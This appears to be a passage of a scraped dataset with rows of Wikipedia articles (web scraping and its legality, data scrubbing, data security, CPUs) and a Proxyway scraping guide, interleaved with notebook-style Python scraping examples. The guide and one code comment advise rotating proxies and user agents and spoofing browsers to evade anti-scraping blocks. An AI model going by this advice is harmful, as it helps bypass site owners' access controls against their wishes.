with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
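The extraction techniques this scraped article describes, plain text-pattern matching on raw HTML and parsing the page into a DOM tree, correspond directly to the re and BeautifulSoup libraries this notebook already imports. Below is a minimal, hypothetical sketch of both approaches; the target URL and the choice of h2 headings as the data points are placeholder assumptions, not part of the article.

# Hypothetical sketch: two of the extraction techniques described above.
import re
import requests
from bs4 import BeautifulSoup

def scrape_headings(url):
    html = requests.get(url, timeout=10).text
    # Technique 1: grep-style regular-expression matching on the raw markup.
    regex_headings = re.findall(r"<h2[^>]*>(.*?)</h2>", html, flags=re.S)
    # Technique 2: parse the page into a DOM tree and query it.
    soup = BeautifulSoup(html, "html5lib")
    dom_headings = [h2.get_text(strip=True) for h2 in soup.find_all("h2")]
    return regex_headings, dom_headings

# Example call against a placeholder site:
# print(scrape_headings("https://example.com"))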
174 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_with_unsourced_statements_from_April_2023 | This category combines all articles with unsourced statements from April 2023 (2023 04) to enable us to work through the backlog more systematically. It is a member of Category:Articles with unsourced statements. To add an article to this category add Citation needed date April 2023 to the article. If you omit the date a bot will add it for you at some point. The following 200 pages are in this category, out of approximately 6,907 total. This list may not reflect recent changes. |
175 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scrubbing | Data scrubbing is an error correction technique that uses a background task to periodically inspect main memory or storage for errors, then corrects detected errors using redundant data in the form of different checksums or copies of data. Data scrubbing reduces the likelihood that single correctable errors will accumulate, leading to reduced risks of uncorrectable errors. Data integrity is a high-priority concern in writing, reading, storage, transmission, or processing of data in computer operating systems and in computer storage and data transmission systems. However, only a few of the currently existing and used file systems provide sufficient protection against data corruption. 1 2 3 To address this issue, data scrubbing provides routine checks of all inconsistencies in data and, in general, prevention of hardware or software failure. This "scrubbing" feature occurs commonly in memory, disk arrays, file systems, or FPGAs as a mechanism of error detection and correction. 4 5 6 With data scrubbing, a RAID controller may periodically read all hard disk drives in a RAID array and check for defective blocks before applications might actually access them. This reduces the probability of silent data corruption and data loss due to bit-level errors. 7 In Dell PowerEdge RAID environments, a feature called "patrol read" can perform data scrubbing and preventive maintenance. 8 In OpenBSD, the bioctl(8) utility allows the system administrator to control these patrol reads through the BIOCPATROL ioctl on the dev bio pseudo-device; as of 2019, this functionality is supported in some device drivers for LSI Logic and Dell controllers — this includes mfi(4) since OpenBSD 5.8 (2015) and mfii(4) since OpenBSD 6.4 (2018). 9 10 In FreeBSD and DragonFly BSD, patrol can be controlled through a RAID controller-specific utility mfiutil(8) since FreeBSD 8.0 (2009) and 7.3 (2010). 11 The implementation from FreeBSD was used by the OpenBSD developers for adding patrol support to their generic bio(4) framework and the bioctl utility, without a need for a separate controller-specific utility. In NetBSD in 2008, the bio(4) framework from OpenBSD was extended to feature support for consistency checks, which was implemented for dev bio pseudo-device under BIOCSETSTATE ioctl command, with the options being start and stop (BIOC SSCHECKSTART VOL and BIOC SSCHECKSTOP VOL, respectively); this is supported only by a single driver as of 2019 — arcmsr(4). 12 Linux MD RAID, as a software RAID implementation, makes data consistency checks available and provides automated repairing of detected data inconsistencies. Such procedures are usually performed by setting up a weekly cron job. Maintenance is performed by issuing operations check, repair, or idle to each of the examined MD devices. Statuses of all performed operations, as well as general RAID statuses, are always available. 13 14 15 As a copy-on-write (CoW) file system for Linux, Btrfs provides fault isolation, corruption detection and correction, and file-system scrubbing. If the file system detects a checksum mismatch while reading a block, it first tries to obtain (or create) a good copy of this block from another device if its internal mirroring or RAID techniques are in use. 16 Btrfs can initiate an online check of the entire file system by triggering a file system scrub job that is performed in the background. 
The scrub job scans the entire file system for integrity and automatically attempts to report and repair any bad blocks it finds along the way. 17 18 The features of ZFS, which is a combined file system and logical volume manager, include the verification against data corruption modes, continuous integrity checking, and automatic repair. Sun Microsystems designed ZFS from the ground up with a focus on data integrity and to protect the data on disks against issues such as disk firmware bugs and ghost writes. failed verification 19 ZFS provides a repair utility called scrub that examines and repairs silent data corruption caused by data rot and other problems. Due to the high integration density of contemporary computer memory chips, the individual memory cell structures became small enough to be vulnerable to cosmic rays and or alpha particle emission. The errors caused by these phenomena are called soft errors. This can be a problem for DRAM- and SRAM-based memories. Memory scrubbing does error-detection and correction of bit errors in computer RAM by using ECC memory, other copies of the data, or other error-correction codes. Scrubbing is a technique used to reprogram an FPGA. It can be used periodically to avoid the accumulation of errors without the need to find one in the configuration bitstream, thus simplifying the design. Numerous approaches can be taken with respect to scrubbing, from simply reprogramming the FPGA to partial reconfiguration. The simplest method of scrubbing is to completely reprogram the FPGA at some periodic rate (typically 1 10 the calculated upset rate). However, the FPGA is not operational during that reprogram time, on the order of micro to milliseconds. For situations that cannot tolerate that type of interruption, partial reconfiguration is available. This technique allows the FPGA to be reprogrammed while still operational. 20 |
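As a rough illustration of the scrubbing idea described above (periodically verify data against stored checksums and repair from a redundant copy), here is a toy Python sketch. It is not how Btrfs, ZFS, or Linux MD RAID actually implement scrubbing, and the directory layout, file names, and checksum table are assumptions made up for the example.

# Toy scrub pass: verify checksums and repair from a mirror copy on mismatch.
import hashlib
import shutil
from pathlib import Path

def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def scrub(primary_dir, mirror_dir, checksums):
    # checksums: mapping of file name -> expected SHA-256 hex digest
    for name, expected in checksums.items():
        primary = Path(primary_dir) / name
        mirror = Path(mirror_dir) / name
        if sha256(primary) != expected:
            if sha256(mirror) == expected:
                shutil.copy2(mirror, primary)  # repair from the good copy
                print(f"repaired {name} from mirror")
            else:
                print(f"uncorrectable error in {name}")

# Example (hypothetical paths and checksum table):
# scrub("data/primary", "data/mirror", {"report.csv": "<expected sha256>"})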
176 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Portal:Current_events | Armed conflicts and attacks Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Business and economy Disasters and accidents Health and environment International relations Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Arts and culture Business and economy Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Disasters and accidents International relations Politics and elections Sports |
177 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_security | Data security means protecting digital data, such as those in a database, from destructive forces and from the unwanted actions of unauthorized users, 1 such as a cyberattack or a data breach. 2 Disk encryption refers to encryption technology that encrypts data on a hard disk drive. 3 Disk encryption typically takes form in either software (see disk encryption software) or hardware (see disk encryption hardware). Disk encryption is often referred to as on-the-fly encryption (OTFE) or transparent encryption. Software-based security solutions encrypt the data to protect it from theft. However, a malicious program or a hacker could corrupt the data to make it unrecoverable, making the system unusable. Hardware-based security solutions prevent read and write access to data, which provides very strong protection against tampering and unauthorized access. Hardware-based security or assisted computer security offers an alternative to software-only computer security. Security tokens such as those using PKCS 11 or a mobile phone may be more secure due to the physical access required in order to be compromised. 4 Access is enabled only when the token is connected and the correct PIN is entered (see two-factor authentication). However, dongles can be used by anyone who can gain physical access to it. Newer technologies in hardware-based security solve this problem by offering full proof of security for data. 5 Working off hardware-based security: A hardware device allows a user to log in, log out and set different levels through manual actions. The device uses biometric technology to prevent malicious users from logging in, logging out, and changing privilege levels. The current state of a user of the device is read by controllers in peripheral devices such as hard disks. Illegal access by a malicious user or a malicious program is interrupted based on the current state of a user by hard disk and DVD controllers making illegal access to data impossible. Hardware-based access control is more secure than the protection provided by the operating systems as operating systems are vulnerable to malicious attacks by viruses and hackers. The data on hard disks can be corrupted after malicious access is obtained. With hardware-based protection, the software cannot manipulate the user privilege levels. A hacker or a malicious program cannot gain access to secure data protected by hardware or perform unauthorized privileged operations. This assumption is broken only if the hardware itself is malicious or contains a backdoor. 6 The hardware protects the operating system image and file system privileges from being tampered with. Therefore, a completely secure system can be created using a combination of hardware-based security and secure system administration policies. Backups are used to ensure data that is lost can be recovered from another source. It is considered essential to keep a backup of any data in most industries and the process is recommended for any files of importance to a user. 7 Data masking of structured data is the process of obscuring (masking) specific data within a database table or cell to ensure that data security is maintained and sensitive information is not exposed to unauthorized personnel. 
8 This may include masking the data from users (for example so banking customer representatives can only see the last four digits of a customer's national identity number), developers (who need real production data to test new software releases but should not be able to see sensitive financial data), outsourcing vendors, etc. 9 Data erasure is a method of software-based overwriting that completely wipes all electronic data residing on a hard drive or other digital media to ensure that no sensitive data is lost when an asset is retired or reused. 10 In the UK, the Data Protection Act is used to ensure that personal data is accessible to those whom it concerns, and provides redress to individuals if there are inaccuracies. 11 This is particularly important to ensure individuals are treated fairly, for example for credit checking purposes. The Data Protection Act states that only individuals and companies with legitimate and lawful reasons can process personal information and cannot be shared. Data Privacy Day is an international holiday started by the Council of Europe that occurs every January 28. 12 Since the General Data Protection Regulation (GDPR) of the European Union (EU) became law on May 25, 2018, organizations may face significant penalties of up to 20 million or 4% of their annual revenue if they do not comply with the regulation. 13 It is intended that GDPR will force organizations to understand their data privacy risks and take the appropriate measures to reduce the risk of unauthorized disclosure of consumers’ private information. 14 The international standards ISO IEC 27001:2013 and ISO IEC 27002:2013 cover data security under the topic of information security, and one of its cardinal principles is that all stored information, i.e. data, should be owned so that it is clear whose responsibility it is to protect and control access to that data. 15 16 The following are examples of organizations that help strengthen and standardize computing security: The Trusted Computing Group is an organization that helps standardize computing security technologies. The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary international information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, automated teller machines, and point of sale cards. 17 The General Data Protection Regulation (GDPR) proposed by the European Commission will strengthen and unify data protection for individuals within the EU, whilst addressing the export of personal data outside the EU. The four types of technical safeguards are access controls, flow controls, inference controls, and data encryption. Access controls manage user entry and data manipulation, while flow controls regulate data dissemination. Inference controls prevent deduction of confidential information from statistical databases and data encryption prevents unauthorized access to confidential information. 18 |
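The data-masking example mentioned above (showing only the last four digits of an identifier) is simple enough to sketch in a few lines of Python. This is a generic illustration; the function name and format are assumptions and are not tied to any particular database or vendor tool.

# Hypothetical masking helper: keep only the last few digits visible.
def mask_identifier(value, visible=4, mask_char="*"):
    digits = "".join(ch for ch in value if ch.isdigit())
    return mask_char * max(len(digits) - visible, 0) + digits[-visible:]

# Example: mask_identifier("1234-5678-9012") returns "********9012"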
178 | https://en.wikipedia.org/wiki/Web_scraping | https://proxyway.com/guides/what-is-web-scraping | Learn the basics of web scraping with this comprehensive overview. Web scraping is a very powerful tool for collecting data on a large scale and extracting valuable insights from it, whether for personal or business use. This guide will give you a comprehensive overview of what web scraping is, how it works, and what you can do with it. Let’s get started. Web scraping refers to the process of collecting data from the web. It’s usually performed using automated tools: web scraping software or custom-built scripts. Web scraping goes by various names. It can also be called web harvesting, web data extraction, screen scraping, or data mining. There are some subtle differences between these terms, but they’re used more or less interchangeably. You may wonder: what’s the point of scraping the web? Well, it creates a lot of value. For one, you can use data scraping to greatly speed up tasks. Let’s say you want to collect reviews from multiple websites like Amazon and Google to learn about a product. With web scraping, it takes minutes; manually, you’d spend hours or even days. Web scraping also helps to automate repetitive work. During Covid-19 lockdowns, it was often very hard to order food online because all the delivery slots were taken. Instead of refreshing the web page manually, you could build a web scraper to do it for you and then notify you once a slot opens. Web scraping also has powerful commercial uses. Some companies use it to research the market by scraping the product and pricing information of competitors. Others aggregate data from multiple sources, for example flight companies, to present great deals. Still others scrape various public sources like YellowPages and Crunchbase to find business leads. Read more: The Main Uses of Web Scraping. Web scraping involves multiple steps done in succession: 1. Identify your target web pages. For example, you may want to scrape all products in a category of an e-commerce store. You can do it by hand or build something called a web crawler to find relevant URLs. 2. Download their HTML code. Every webpage is built using HTML; you can see how it looks by pressing the right mouse button in your web browser and selecting Inspect. 3. Extract the data points you want. HTML is messy and has unnecessary information, so you’ll need to clean it up. This process is called data parsing. The end result is structured data in a .json or .csv file, or another readable format. 4. Adjust your web scraper as needed. Websites tend to change often, and you might find more efficient ways to do things. There are many tools to facilitate the data scraping process or offload some of the work from you. Ready-made web scrapers let you avoid building your own; proxies can help you circumvent blocks; and if you want, you can get scraping services to do the whole job for you. Web scraping is not always a welcome, or even ethical, affair. Scrapers often ignore the website’s guidelines (ToS and robots.txt), bring down its servers with too many requests, or even appropriate the data they scrape to launch a competing service. 
It’s no wonder many websites are keen on blocking any crawler or scraper in sight (except, of course, search engines). Still, web scraping as such is legal, with some limitations. Over the years, there have been a number of landmark cases. We’re no lawyers, but it has been established that web scraping a website is okay as long as the information is publicly available and doesn’t involve copyrighted or personal information. Since the question of web scraping isn’t always straightforward (each use case is considered individually), it’s wise to seek legal advice. Web scraping is not the only method for getting data from websites. In fact, it’s not even the default one. The preferred approach is using an API. An API, or application programming interface, provides a method to interact with a certain website or app programmatically. Websites like reddit.com have APIs that allow anyone to download their contents. However, APIs have problems. First, not all websites offer them. Second, the data an API gives can often be stale. Third, you often have to deal with limits on what data you can collect and how often. And finally, for some reason APIs tend to change or break more often than even web scraping scripts. So, the main difference between web scraping and an API is that the former gives better access to data: whatever you can see in your browser, you can get. However, web scraping often happens without websites knowing about it. And when they do find out, they’re not very happy about it. There’s no shortage of web scraping tools in the market. If you want, you can even scrape with Microsoft Excel. Should you, though? Probably not. Web scraping tools can be divided into three categories: 1) custom-built, 2) ready-made, and 3) web scraping APIs. One way to go about scraping is to build a scraper yourself. There are relevant libraries and frameworks in various programming languages, but Python and Node.js are the most popular choices. For those without programming skills or time, you can go with ready-made web scraping tools. No-code web scrapers have everything configured for you and are wrapped in a nice user interface. They let you scrape without any programming knowledge. However, their visual controls and focus on beginners may make them less suitable for serious projects. The middle ground between the first two categories is web scraping APIs. They have a steeper learning curve than visual scrapers but are more extensible. In essence, these APIs handle proxies and the web scraping logic, so that you can extract data by making a simple API call to the provider’s infrastructure. Read more: The Best Web Scraping Tools. Web scraping isn’t easy; some websites do their best to ensure you can’t catch a break. Here are some of the obstacles you might encounter. Modern websites use request throttling to avoid overloading the servers and unnecessary connection interruptions. The website controls how often you can send requests within a specific time window. When you reach the limit, your web scraper won’t be able to perform any further actions. If you ignore it, your IP address might get blocked. Another challenge that can greatly hinder your web scraping efforts is CAPTCHAs. It’s a technique used to fight bots. CAPTCHAs can be triggered because you’re 1) making too many requests in a short time, 2) using low-quality proxies, or 3) not covering your web scraper’s fingerprint properly. 
Some CAPTCHAs are hard-coded into the HTML markup and appear at certain points like registration. And until you pass the test, your scraper is out of work. The most gruesome way a website can punish you for scraping is by blocking your IP address. However, there’s a problem with IP bans: the website’s owner can ban a whole range of IPs (256), so all the people who share the same subnet will lose access. That’s why websites are reluctant to use this method. Read more: Web Scraping Challenges and Ways to Overcome Them. Here are some web scraping best practices to help your project succeed. First and foremost, respect the website you’re scraping. You should read data privacy regulations and respect the website’s terms of service. Also, most websites have a robots.txt file; it gives instructions on which content a crawler can access and what it should avoid. Websites can track your actions. If you send too many requests, your actions will be red-flagged. So, you should act naturally by keeping random intervals between connection requests and reducing the crawling rate. And if you don’t want to burden both the website and your web scraper, don’t collect data during peak hours. Another critical step is to take care of your digital identity. Websites use anti-scraping technologies like CAPTCHAs, IP blocks, and request throttling. To avoid these and other obstacles, rotate your proxies and the user-agent. The first covers location hiding, and the latter browser spoofing. So, every time you connect, you’ll have a “new” identity. Read more: Web Scraping Best Practices. Let’s say you want to build your first Python web scraper. How do you go about it? Well, you can write a simple tool with just a few lines of code, but there are a few steps you should follow: 1. If you’re a newbie to web scraping, go with libraries like Requests and Beautiful Soup. Requests is an HTTP client that will fetch you raw HTML, while Beautiful Soup will structure the data you’ve downloaded. 2. Then, decide on a target website and project parameters like URLs and data points you want to scrape. If you don’t have any particular website in mind, choose a dummy site to practice your scraping skills. 3. To build your web scraper, you’ll also need a code editor. You can choose any editor you like, such as Notepad++ or Visual Studio Code, or use the one preinstalled on your computer. Once you have all the prerequisites, you can write your first Python script: send HTTP requests to the website, parse the HTML response, and save the data. Read more: Python Web Scraping Tutorial. With Requests and Beautiful Soup you can learn basic skills by scraping static data. If you want to target dynamic websites and learn how to deal with things like infinite scrolling and lazy loading, go with Selenium. The tool controls a headless browser and is fully capable of dealing with dynamic pages. Read more: Web Scraping with Selenium: An Ultimate Guide for Beginners. You’re not limited to web scraping using Selenium and Python. There are other powerful headless browsers that can deal with JavaScript-rendered web pages. For example, if you want to try web scraping with NodeJS, go with Playwright or Puppeteer. Both tools are much lighter on resources than Selenium and easier to set up. You May Also Like: Web Scraping with Node.js: A Practical Guide for Beginners Web Scraping with Python: All You Need to Get Started 
|
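To make the steps from the scraped article above concrete (fetch with Requests, parse with Beautiful Soup, save the data), here is a minimal sketch. The target site and its CSS selectors (quotes.toscrape.com, div.quote, span.text, small.author) are assumptions chosen for practice purposes, not something taken from the article; any dummy site works the same way.

import random
import time

import pandas as pd
import requests
from bs4 import BeautifulSoup

# Assumed practice target; swap in whichever dummy site you prefer.
URL = "https://quotes.toscrape.com/"

# A descriptive User-Agent header; rotate several of these for larger jobs.
headers = {"User-Agent": "Mozilla/5.0 (compatible; learning-scraper/0.1)"}

# Keep a small random pause before the request, as the best practices above suggest.
time.sleep(random.uniform(1, 3))

response = requests.get(URL, headers=headers, timeout=10)
response.raise_for_status()  # fail loudly on 4xx/5xx answers

# Parse the raw HTML; html5lib matches the parser installed earlier in the notebook.
soup = BeautifulSoup(response.text, "html5lib")

rows = []
for quote in soup.select("div.quote"):  # selectors assumed for this sandbox site
    rows.append({
        "text": quote.select_one("span.text").get_text(strip=True),
        "author": quote.select_one("small.author").get_text(strip=True),
    })

# Save the structured data, mirroring the fetch -> parse -> save workflow.
pd.DataFrame(rows).to_csv("quotes.csv", index=False)
print(f"Saved {len(rows)} quotes to quotes.csv")

Swapping the URL and the selectors is all it takes to point the same skeleton at another static page; dynamic pages are where Selenium, Playwright, or Puppeteer come in.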
179 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Central_processing_unit | A central processing unit (CPU), also called a central processor, main processor, or just processor, is the most important processor in a given computer. 1 2 Its electronic circuitry executes instructions of a computer program, such as arithmetic, logic, controlling, and input output (I O) operations. 3 4 5 This role contrasts with that of external components, such as main memory and I O circuitry, 6 and specialized coprocessors such as graphics processing units (GPUs). The form, design, and implementation of CPUs have changed over time, but their fundamental operation remains almost unchanged. 7 Principal components of a CPU include the arithmetic logic unit (ALU) that performs arithmetic and logic operations, processor registers that supply operands to the ALU and store the results of ALU operations, and a control unit that orchestrates the fetching (from memory), decoding and execution (of instructions) by directing the coordinated operations of the ALU, registers, and other components. Modern CPUs devote a lot of semiconductor area to caches and instruction-level parallelism to increase performance and to CPU modes to support operating systems and virtualization. Most modern CPUs are implemented on integrated circuit (IC) microprocessors, with one or more CPUs on a single IC chip. Microprocessor chips with multiple CPUs are called multi-core processors. 8 The individual physical CPUs, called processor cores, can also be multithreaded to support CPU-level multithreading. 9 An IC that contains a CPU may also contain memory, peripheral interfaces, and other components of a computer; 10 such integrated devices are variously called microcontrollers or systems on a chip (SoC). Early computers such as the ENIAC had to be physically rewired to perform different tasks, which caused these machines to be called "fixed-program computers". 11 The "central processing unit" term has been in use since as early as 1955. 12 13 Since the term "CPU" is generally defined as a device for software (computer program) execution, the earliest devices that could rightly be called CPUs came with the advent of the stored-program computer. The idea of a stored-program computer had been already present in the design of J. Presper Eckert and John William Mauchly's ENIAC, but was initially omitted so that ENIAC could be finished sooner. 14 On June 30, 1945, before ENIAC was made, mathematician John von Neumann distributed a paper entitled First Draft of a Report on the EDVAC. It was the outline of a stored-program computer that would eventually be completed in August 1949. 15 EDVAC was designed to perform a certain number of instructions (or operations) of various types. Significantly, the programs written for EDVAC were to be stored in high-speed computer memory rather than specified by the physical wiring of the computer. 16 This overcame a severe limitation of ENIAC, which was the considerable time and effort required to reconfigure the computer to perform a new task. 17 With von Neumann's design, the program that EDVAC ran could be changed simply by changing the contents of the memory. EDVAC was not the first stored-program computer; the Manchester Baby, which was a small-scale experimental stored-program computer, ran its first program on 21 June 1948 18 and the Manchester Mark 1 ran its first program during the night of 16 17 June 1949. 
